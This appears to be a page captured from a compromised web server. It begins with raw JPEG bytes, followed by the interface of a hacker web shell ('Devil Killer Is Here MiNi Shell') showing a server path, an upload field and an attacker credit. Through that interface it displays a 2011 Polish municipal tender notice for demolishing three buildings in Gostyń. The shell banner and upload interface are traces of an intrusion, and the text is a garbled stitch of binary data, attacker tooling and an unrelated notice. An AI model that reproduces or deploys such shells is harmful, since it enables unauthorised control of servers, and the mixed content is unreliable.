JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20110512/136377-N-2011.html

<p class="kh_header"><b>Gostyń: Rozbiórka budynków przy ul. Jana Pawła II w Gostyniu</b><br>
<b>Numer ogłoszenia: 136377 - 2011; data zamieszczenia: 12.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gostyń, reprezentowana przez Burmistrza Gostynia , ul. Rynek 2, 63-800 Gostyń, woj. wielkopolskie, tel. 065 5752110-13, faks 065 5752142.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.gostyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbiórka budynków przy ul. Jana Pawła II w Gostyniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbiórka budynków przy ul. Jana Pawła II w Gostyniu;

Przedmiot zamówienia obejmuje rozbiórkę trzech budynków i podzielony jest na trzy części wg niżej zamieszczonego opisu. Zamawiający dopuszcza składanie ofert częściowych na wszystkie części, dwie lub na jedną wybraną część 
(na oddzielnych formularzach ofertowych)

Część I - Rozbiórka budynku mieszkalnego przy ul. Jana Pawła II 12 w Gostyniu;

Prace rozbiórkowe dotyczą:
Obiektu - jednokondygnacyjnego, niepodpiwniczonego, wybudowanego w technologii tradycyjnej, murowanego z cegły, o pow. użytkowej ok. 60 m2. Dach dwuspadowy konstrukcji drewnianej pokryty papą, okna skrzynkowe podwójne, drzwi drewniane pełne, podłogi drewniane deskowe. Tynki wewnętrzne cementowo - wapienne pokryte powłokami malarskimi.

Część II - Rozbiórka budynku mieszkalnego z dobudową i budynków gospodarczych  przy ul. Jana Pawła II 18 w Gostyniu;

Prace rozbiórkowe dotyczą:
Budynku mieszkalnego - jednokondygnacyjnego z poddaszem nieużytkowym, podpiwniczonego w 1/3 części. Część główna budynku usytuowana od strony ulicy, dobudówka - od strony podwórza. Konstrukcja dachu drewniana, dach dwuspadowy, pokryty dachówką ceramiczną od strony ulicy, od podwórza kryty papą, opierzenia, rynny i rury spustowe - blacha stalowa ocynkowana. Stolarka okienna - skrzynkowa, podwójna, stolarka drzwiowa - drewniana pełna i płytowa, podłogi - drewniane deskowe, częściowo pokryte wykładziną PCV, w łazience - płytki ceramiczne. Tynki wewnętrzne cementowo - wapienne pokryte powłokami malarskimi i tapetą. Instalacje: wodno - kanalizacyjna, energetyczna, gazowa, ogrzewanie - C.O. indywidualne. 
Powierzchnia użytkowa budynku wynosi ogółem 110,05 m2. W budynku głównym o pow. użytkowej 38,45 m2 wysokość pomieszczeń nie przekracza 2.20 m.

Budynku gospodarczego - obiektu jednokondygnacyjnego, murowanego składającego się z 3 pomieszczeń. Stropodach drewniany, deskowy, pokryty papą i płytami azbestowo-cementowymi (eternit - pow. 10,5 m2), wrota drewniane, instalacje - brak, posadzki - cementowe.
Uwaga: w zakres zamówienia wchodzi również utylizacja eternitu; rozbiórka i utylizacja płyt azbestowo - cementowych nastąpi zgodnie rozporządzeniem ministra gospodarki, pracy 
i polityki społecznej z dnia 2 kwietnia 2004 roku w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. 2004 nr 71 poz. 649 ze zm.). 

Część III - Rozbiórka budynku mieszkalnego z dobudową i budynków gospodarczych  przy ul. Jana Pawła II 20 w Gostyniu;

Prace rozbiórkowe dotyczą:
Budynku mieszkalnego - niepodpiwniczonego o dachu częściowo stromym z poddaszem nieużytkowym oraz dachem płaskim dwuspadowym. Opis konstrukcji: fundamenty częściowo wykonane z kamienia polnego zalanego wapnem oraz ława fundamentowa żwirobetonowa wylewana na mokro, ścianki fundamentowe, konstrukcyjne oraz działowe murowane częściowo z cegły ceramicznej pełnej, pustaków oraz bloczków gazobetonowych na zaprawie cementowo - wapiennej. Strop lekkiej konstrukcji drewniany, odcinkowy z deskowaniem pełnym. Schody na poddasze lekkiej konstrukcji drewniane. Dach częściowo dwuspadowy, konstrukcji drewnianej kryty dachówką cementową, nie ocieplony oraz papą asfaltową na lepiku. Tynk zewnętrzny cementowo - wapienny, gładki, malowany. Obróbki blacharskie, rynny rury spustowe wykonane z blachy stalowej ocynkowanej. Kominy murowane z cegły pełnej ceramicznej. Opis wykończenia pomieszczeń: posadzki betonowe częściowo wyłożone deskami drewnianymi struganymi, płytkami ceramicznymi ułożonymi na cemencie oraz wykładziny PCV. Ściany tynkowane tynkiem cementowo - wapiennym kat. III, nie gipsowane, malowane farbami emulsyjnymi, częściowo tapetowane, malowane oraz częściowe okładziny ścian z płyt laminowanych oraz płytek ceramicznych. Sufit tynkowany na trzcinie. Stolarka okienna drewniana - krosnowa, stolarka drzwiowa drewniana, częściowo przeszklona oraz pełna. Pow. zabudowy 156,40 m2, pow. użytkowa 118,00 m2.

Budynku gospodarczego - z niewielkim podpiwniczeniem oraz poddaszem, wymurowany w technologii tradycyjnej o dachu płaskim jednospadowym. Opis technologii konstrukcji - ławy fundamentowe żwirobetonowe wylewane na mokro na podsypce piaskowej i warstwie chudego betonu. Mury fundamentowe murowane z bloczków betonowych M6 na zaprawie cementowo - wapiennej (rozbiórka piwnic - do poziomu zerowego), ściany konstrukcyjne oraz działowe murowane z pustaków ceramicznych oraz cegły ceramicznej pełnej na zaprawie cementowo - wapiennej. Strop żelbetowy wykonany z płyt betonowych wspartych na ściankach konstrukcyjnych. Dach płaski jednospadowy, belkowy, odcinkowy kryty częściowo papą oraz płytami azbestowo-cementowe (eternit - 117,30 m2) ułożonymi na deskowaniu pełnym. Nadproża okienne i drzwiowe typowe żelbetowe L19. Obróbki blacharskie, rynny i rury spustowe wykonane z blachy stalowej ocynkowanej. Budynek otynkowany na zewnątrz. Opis wykończenia - posadzki betonowe zatarte na gładko, ściany tynkowane tynkiem cementowo - wapiennym kat. III, częściowo malowane mleczkiem wapiennym, stolarka okienna i drzwiowa typu inwestorskiego. Pow. zabudowy 64,30 m2, pow. użytkowa 67,50 m2 .
Uwaga: w zakres zamówienia wchodzi również utylizacja eternitu; rozbiórka i utylizacja płyt azbestowo - cementowych nastąpi zgodnie rozporządzeniem ministra gospodarki, pracy 
i polityki społecznej z dnia 2 kwietnia 2004 roku w sprawie sposobów i warunków bezpiecznego użytkowania i usuwania wyrobów zawierających azbest (Dz. U. 2004 nr 71 poz. 649 ze zm.). 

Zakres robót objętych cz. I, II i III obejmuje ponadto: zabezpieczenie terenu, uporządkowanie terenu po rozbiórce. Pozyskany gruz należy wywieź na gminne gruzowisko w Malewie. 
Sposób wykonania: ręczne zdemontowanie pokrycia dachowego, mechaniczna rozbiórka murów budynków..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składający ofertę musi wnieść wadium (odpowiednio do wybranej części zamówienia), w wysokości:
Cz. I 	- 1.000,00 zł (słownie: jeden tysiąc złotych);
Cz. II 	- 1.000,00 zł (słownie: jeden tysiąc złotych);
Cz. III 	- 1.000,00 zł (słownie: jeden tysiąc złotych);
Wadium wnosi się przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółówego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga wykazanie się doświadczeniem zawodowym, potwierdzonym wykonaniem zgodnie z zasadami sztuki budowlanej (w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej jednej roboty, polegającej na pracach rozbiórkowych;

Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów (niżej wymienionych).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółówego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga: dysponowanie osobą z uprawnieniami do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, posiadającą aktualne zaświadczenie przynależności do właściwej Izby Samorządu Zawodowego;

Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów (niżej wymienionych).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga: posiadanie aktualnego ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;

Ocena spełniania warunków wymaganych od wykonawców zostanie dokonana na podstawie analizy przedstawionych dokumentów (niżej wymienionych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty nalezy dołączyć ponadto: pełnomocnictwo, jeżeli dotyczy, a nie wynika ono z innych przedstawionych dokumentów, dowód wniesienia wadium oraz oświadczenie o dokonaniu wizji lokalnej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy dopuszczone są w granicach unormowania art. 144 ustawy Prawo zamówień publicznych, w następujących przypadkach: zmiany danych adresowych stron, ich rachunków bankowych bądź zmiany osób  wymienionych przez strony do realizacji umowy, zmiany formy prawnej prowadzenia działalności gospodarczej przez Wykonawcę, zmiany terminu wykonania zadania w przypadku wystąpienia nieprzewidzianych okoliczności, na które wykonawca nie ma wpływu (m. in.: oczekiwanie na niezbędne uzgodnienia).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gostyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (nieodpłatnie) można odebrać w Urzędzie Miejskim, ul. Wrocławska 256, pok. nr 17, otrzymać za zaliczeniem pocztowym lub pobrać ze strony internetowej Urzędu Miejskiego..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2011 godzina 09:00, miejsce: Pisemne oferty należy składać lub przesłać na adres: Urząd Miejski w Gostyniu, Rynek 2, pok. nr 10 (sekretariat) lub składać w Wydziale Mienia Gminy i Rolnictwa, ul. Wrocławska 256, pok. nr 17..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do kontaktów z wykonawcami są: Mariusz Konieczny, Przemysław Przybył (e-mail: pprzybyl@um.gostyn.pl), Wydział Mienia Gminy i Rolnictwa, Urząd Miejski w Gostyniu, ul. Wrocławska 256, pok. nr  17,  tel. 65-575 21 10, (tel. bezpośredni 65-575 21 39 lub 65-575 21 37), w dni powszednie w godz. od 8.00 do 15.00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rozbiórka budynku mieszkalnego przy ul. Jana Pawła II 12 w Gostyniu;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis prac do wykonania zamieszczono w opisie przedmiotu zamówienia;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Rozbiórka budynku mieszkalnego z dobudową i budynków gospodarczych  przy ul. Jana Pawła II 18 w Gostyniu;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis prac do wykonania zamieszczono w opisie przedmiotu zamówienia;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Rozbiórka budynku mieszkalnego z dobudową i budynków gospodarczych  przy ul. Jana Pawła II 20 w Gostyniu;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opis prac do wykonania zamieszczono w opisie przedmiotu zamówienia;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com